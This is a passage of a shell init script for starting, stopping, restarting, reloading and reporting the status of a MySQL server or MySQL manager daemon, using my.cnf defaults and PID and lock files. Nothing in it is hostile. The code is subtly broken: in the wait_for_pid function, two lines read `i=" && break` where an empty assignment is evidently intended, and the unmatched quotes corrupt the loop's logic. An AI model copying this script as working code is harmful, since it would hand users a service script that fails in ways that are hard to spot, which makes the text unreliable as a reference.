# Expected: "--skip-networking --skip-grant-tables"
# They are not checked here, intentionally, as it is the resposibility
# of the "spec" file author to give correct arguments only.

case `echo "testing\c"`,`echo -n testing` in
*c*,-n*) echo_n=   echo_c=     ;;
*c*,*)   echo_n=-n echo_c=     ;;
*)       echo_n=   echo_c='\c' ;;
esac

parse_server_arguments() {
for arg do
case "$arg" in
--basedir=*)  basedir=`echo "$arg" | sed -e 's/^[^=]*=//'`
bindir="$basedir/bin"
if test -z "$datadir_set"; then
datadir="$basedir/data"
fi
sbindir="$basedir/sbin"
libexecdir="$basedir/libexec"
;;
--datadir=*)  datadir=`echo "$arg" | sed -e 's/^[^=]*=//'`
datadir_set=1
;;
--user=*)  user=`echo "$arg" | sed -e 's/^[^=]*=//'` ;;
--pid-file=*) server_pid_file=`echo "$arg" | sed -e 's/^[^=]*=//'` ;;
--service-startup-timeout=*) service_startup_timeout=`echo "$arg" | sed -e 's/^[^=]*=//'` ;;
--use-mysqld_safe) use_mysqld_safe=1;;
--use-manager)     use_mysqld_safe=0;;
esac
done
}

parse_manager_arguments() {
for arg do
case "$arg" in
--pid-file=*) pid_file=`echo "$arg" | sed -e 's/^[^=]*=//'` ;;
--user=*)  user=`echo "$arg" | sed -e 's/^[^=]*=//'` ;;
esac
done
}

wait_for_pid () {
verb="$1"
manager_pid="$2"  # process ID of the program operating on the pid-file
i=0
avoid_race_condition="by checking again"
while test $i -ne $service_startup_timeout ; do

case "$verb" in
'created')
# wait for a PID-file to pop into existence.
test -s $pid_file && i=" && break
;;
'removed')
# wait for this PID-file to disappear
test ! -s $pid_file && i=" && break
;;
*)
echo "wait_for_pid () usage: wait_for_pid created|removed manager_pid"
exit 1
;;
esac

# if manager isn't running, then pid-file will never be updated
if test -n "$manager_pid"; then
if kill -0 "$manager_pid" 2>/dev/null; then
:  # the manager still runs
else
# The manager may have exited between the last pid-file check and now.
if test -n "$avoid_race_condition"; then
avoid_race_condition=""
continue  # Check again.
fi

# there's nothing that will affect the file.
log_failure_msg "Manager of pid-file quit without updating file."
return 1  # not waiting any more.
fi
fi

echo $echo_n ".$echo_c"
i=`expr $i + 1`
sleep 1
done

if test -z "$i" ; then
log_success_msg
return 0
else
log_failure_msg
return 1
fi
}

# Get arguments from the my.cnf file,
# the only group, which is read from now on is [mysqld]
if test -x ./bin/my_print_defaults
then
print_defaults="./bin/my_print_defaults"
elif test -x $bindir/my_print_defaults
then
print_defaults="$bindir/my_print_defaults"
elif test -x $bindir/mysql_print_defaults
then
print_defaults="$bindir/mysql_print_defaults"
else
# Try to find basedir in /etc/my.cnf
conf=/etc/my.cnf
print_defaults=
if test -r $conf
then
subpat='^[^=]*basedir[^=]*=\(.*\)$'
dirs=`sed -e "/$subpat/!d" -e 's//\1/' $conf`
for d in $dirs
do
d=`echo $d | sed -e 's/[  ]//g'`
if test -x "$d/bin/my_print_defaults"
then
print_defaults="$d/bin/my_print_defaults"
break
fi
if test -x "$d/bin/mysql_print_defaults"
then
print_defaults="$d/bin/mysql_print_defaults"
break
fi
done
fi

# Hope it's in the PATH … but I doubt it
test -z "$print_defaults" && print_defaults="my_print_defaults"
fi

#
# Read defaults file from 'basedir'.   If there is no defaults file there
# check if it's in the old (depricated) place (datadir) and read it from there
#

extra_args=""
if test -r "$basedir/my.cnf"
then
extra_args="-e $basedir/my.cnf"
else
if test -r "$datadir/my.cnf"
then
extra_args="-e $datadir/my.cnf"
fi
fi

parse_server_arguments `$print_defaults $extra_args mysqld server mysql_server mysql.server`

# Look for the pidfile
parse_manager_arguments `$print_defaults $extra_args manager`

#
# Set pid file if not given
#
if test -z "$pid_file"
then
pid_file=$datadir/mysqlmanager-`@HOSTNAME@`.pid
else
case "$pid_file" in
/* ) ;;
* )  pid_file="$datadir/$pid_file" ;;
esac
fi
if test -z "$server_pid_file"
then
server_pid_file=$datadir/`@HOSTNAME@`.pid
else
case "$server_pid_file" in
/* ) ;;
* )  server_pid_file="$datadir/$server_pid_file" ;;
esac
fi

case "$mode" in
'start')
# Start daemon

# Safeguard (relative paths, core dumps..)
cd $basedir

manager=$bindir/mysqlmanager
if test -x $libexecdir/mysqlmanager
then
manager=$libexecdir/mysqlmanager
elif test -x $sbindir/mysqlmanager
then
manager=$sbindir/mysqlmanager
fi

echo $echo_n "Starting MySQL"
if test -x $manager -a "$use_mysqld_safe" = "0"
then
if test -n "$other_args"
then
log_failure_msg "MySQL manager does not support options '$other_args'"
exit 1
fi
# Give extra arguments to mysqld with the my.cnf file. This script may
# be overwritten at next upgrade.
"$manager" \
--mysqld-safe-compatible \
--user="$user" \
--pid-file="$pid_file" >/dev/null 2>&1 &
wait_for_pid created $!; return_value=$?

# Make lock for RedHat / SuSE
if test -w /var/lock/subsys
then
touch /var/lock/subsys/mysqlmanager
fi
exit $return_value
elif test -x $bindir/mysqld_safe
then
# Give extra arguments to mysqld with the my.cnf file. This script
# may be overwritten at next upgrade.
pid_file=$server_pid_file
$bindir/mysqld_safe --datadir=$datadir --pid-file=$server_pid_file $other_args >/dev/null 2>&1 &
wait_for_pid created $!; return_value=$?

# Make lock for RedHat / SuSE
if test -w /var/lock/subsys
then
touch /var/lock/subsys/mysql
fi
exit $return_value
else
log_failure_msg "Couldn't find MySQL manager ($manager) or server ($bindir/mysqld_safe)"
fi
;;

'stop')
# Stop daemon. We use a signal here to avoid having to know the
# root password.

# The RedHat / SuSE lock directory to remove
lock_dir=/var/lock/subsys/mysqlmanager

# If the manager pid_file doesn't exist, try the server's
if test ! -s "$pid_file"
then
pid_file=$server_pid_file
lock_dir=/var/lock/subsys/mysql
fi

if test -s "$pid_file"
then
mysqlmanager_pid=`cat $pid_file`

if (kill -0 $mysqlmanager_pid 2>/dev/null)
then
echo $echo_n "Shutting down MySQL"
kill $mysqlmanager_pid
# mysqlmanager should remove the pid_file when it exits, so wait for it.
wait_for_pid removed "$mysqlmanager_pid"; return_value=$?
else
log_failure_msg "MySQL manager or server process #$mysqlmanager_pid is not running!"
rm $pid_file
fi

# delete lock for RedHat / SuSE
if test -f $lock_dir
then
rm -f $lock_dir
fi
exit $return_value
else
log_failure_msg "MySQL manager or server PID file could not be found!"
fi
;;

'restart')
# Stop the service and regardless of whether it was
# running or not, start it again.
if $0 stop  $other_args; then
$0 start $other_args
else
log_failure_msg "Failed to stop running server, so refusing to try to start."
exit 1
fi
;;

'reload'|'force-reload')
if test -s "$server_pid_file" ; then
read mysqld_pid <  $server_pid_file
kill -HUP $mysqld_pid && log_success_msg "Reloading service MySQL"
touch $server_pid_file
else
log_failure_msg "MySQL PID file could not be found!"
exit 1
fi
;;
'status')
# First, check to see if pid file exists
if test -s "$server_pid_file" ; then
read mysqld_pid < $server_pid_file
if kill -0 $mysqld_pid 2>/dev/null ; then
log_success_msg "MySQL running ($mysqld_pid)"
exit 0
else
log_failure_msg "MySQL is not running, but PID file exists"
exit 1
fi
else
# Try to find appropriate mysqld process
mysqld_pid=`pidof $libexecdir/mysqld`
if test -z $mysqld_pid ; then
if test "$use_mysqld_safe" = "0" ; then
lockfile=/var/lock/subsys/mysqlmanager
else
lockfile=/var/lock/subsys/mysql
fi
if test -f $lockfile ; then
log_failure_msg "MySQL is not running, but lock exists"
exit 2
fi
log_failure_msg "MySQL is not running"
exit 3
else
log_failure_msg "MySQL is running but PID file could not be found"
exit 4
fi
fi
;;
*)
# usage
echo "Usage: $0  {start|stop|restart|reload|force-reload|status}  [ MySQL server options ]"
exit 1
;;
esac

exit 0